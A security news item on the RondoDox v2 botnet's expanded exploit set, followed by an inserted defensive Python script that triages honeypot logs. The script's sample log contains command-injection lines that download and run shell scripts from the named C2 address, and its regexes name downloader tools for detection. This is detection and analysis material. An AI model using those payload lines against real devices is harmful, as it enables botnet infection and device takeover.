RondoDox Botnet Updates Its Arsenal With 650% More Exploits...
A sophisticated evolution of the RondoDox botnet has emerged with a staggering 650% increase in exploitation capabilities, marking a significant escalation in the threat landscape for both enterprise and IoT infrastructure.
First documented by FortiGuard Labs in September 2024, the original RondoDox variant focused narrowly on DVR systems with just two exploit vectors.
The newly discovered RondoDox v2, however, demonstrates a dramatic expansion with over 75 distinct exploitation vectors targeting everything from legacy routers to modern enterprise applications.
This evolution represents a fundamental shift in botnet development strategy, bridging the gap between opportunistic IoT exploitation and targeted enterprise compromise.
The malware was detected on October 30, 2025, through honeypot telemetry, when research infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83, geolocated to New Zealand.
The attack pattern immediately distinguished itself through its volume and sophistication, deploying 75 distinct exploit payloads in rapid succession.
Each payload attempted command injection against a router or IoT vulnerability, and every payload fetched its next-stage script from the command-and-control server at 74.194.191.52.
Unusually, the threat actor embedded an open attribution signature—[email protected]—directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators.
Beelzebub analysts identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities.
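The capture described above (one scanning source firing many command-injection payloads that all pull a script from a single C2 host, with an attribution string in the User-Agent) is the kind of pattern a honeypot operator wants to triage quickly. The script below is an added example, not code from the article or from Beelzebub: it scans a small honeypot log for command-injection payloads, extracts the download URL and its host from each, pulls any e-mail-style signature out of the User-Agent, and groups hits by (source, C2 host). The log lines are constructed; only the two IP addresses come from the article, and the paths, file names, log layout and the e-mail placeholder are hypothetical.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote_plus, urlparse

# Constructed sample honeypot log in a simple "src_ip | METHOD path | user_agent" layout.
# Only the two IP addresses come from the article; the paths, file names and the
# e-mail address in the User-Agent are hypothetical placeholders.
SAMPLE_LOG = """\
124.198.131.83 | POST /cgi-bin/login.cgi?user=admin;wget+http://74.194.191.52/x.sh+-O+/tmp/x;sh+/tmp/x | Mozilla/5.0 (ops-contact@example.net)
124.198.131.83 | GET /setup.cgi?todo=$(curl+http://74.194.191.52/arm7) | Mozilla/5.0 (ops-contact@example.net)
10.0.0.7 | GET /index.html | Mozilla/5.0 (X11; Linux x86_64)
203.0.113.9 | GET /login?next=%2Fhome | curl/8.4.0
"""

# A shell metacharacter (or "$(") followed by a downloader or interpreter is the
# hallmark of the command-injection payloads the article describes.
INJECTION_RE = re.compile(r"(?:[;|&`]|\$\()\s*(?:wget|curl|tftp|busybox|sh|bash)\b", re.I)
# First URL handed to wget/curl, skipping any flags placed before it.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(?P<url>https?://[^\s;|&'\")]+)", re.I)
# Loose e-mail matcher for attribution strings embedded in User-Agent headers.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into its fields; URL-decode the path so '+' and %XX escapes
    cannot hide the injected shell command from the regexes."""
    parts = line.split(" | ", 2)
    if len(parts) != 3:
        return None
    src_ip, request, user_agent = parts
    method, _, path = request.partition(" ")
    return {"src_ip": src_ip, "method": method, "path": unquote_plus(path), "user_agent": user_agent}


def triage(log_text: str) -> list:
    """Return only the requests that look like command injection, each annotated with
    the stager URL, the C2 host it points at, and any attribution e-mail in the UA."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not INJECTION_RE.search(rec["path"]):
            continue
        m = DOWNLOAD_RE.search(rec["path"])
        rec["download_url"] = m.group("url") if m else None
        rec["c2_host"] = urlparse(rec["download_url"]).hostname if m else None
        e = EMAIL_RE.search(rec["user_agent"])
        rec["attribution"] = e.group(0) if e else None
        hits.append(rec)
    return hits


def c2_summary(hits: list) -> Counter:
    """Count injection payloads per (scanner source, C2 host) pair, which is how a
    single campaign fanning out many exploits to one stager host shows up."""
    return Counter((h["src_ip"], h["c2_host"]) for h in hits)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(h["src_ip"], h["method"], h["download_url"], h["attribution"])
    print(c2_summary(found))
```

The decode step matters: honeypot payloads commonly arrive URL-encoded, and a regex run over the raw request line would miss `$(curl ...)` written as `%24%28curl...`. Grouping by C2 host rather than by exploit path is what separates one campaign with 75 payloads from 75 unrelated scanners.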
RondoDox v2 targets an extensive range of vulnerable devices across multiple vendor ecosystems and more than a decade of CVE history.
Source: Cybersecurity News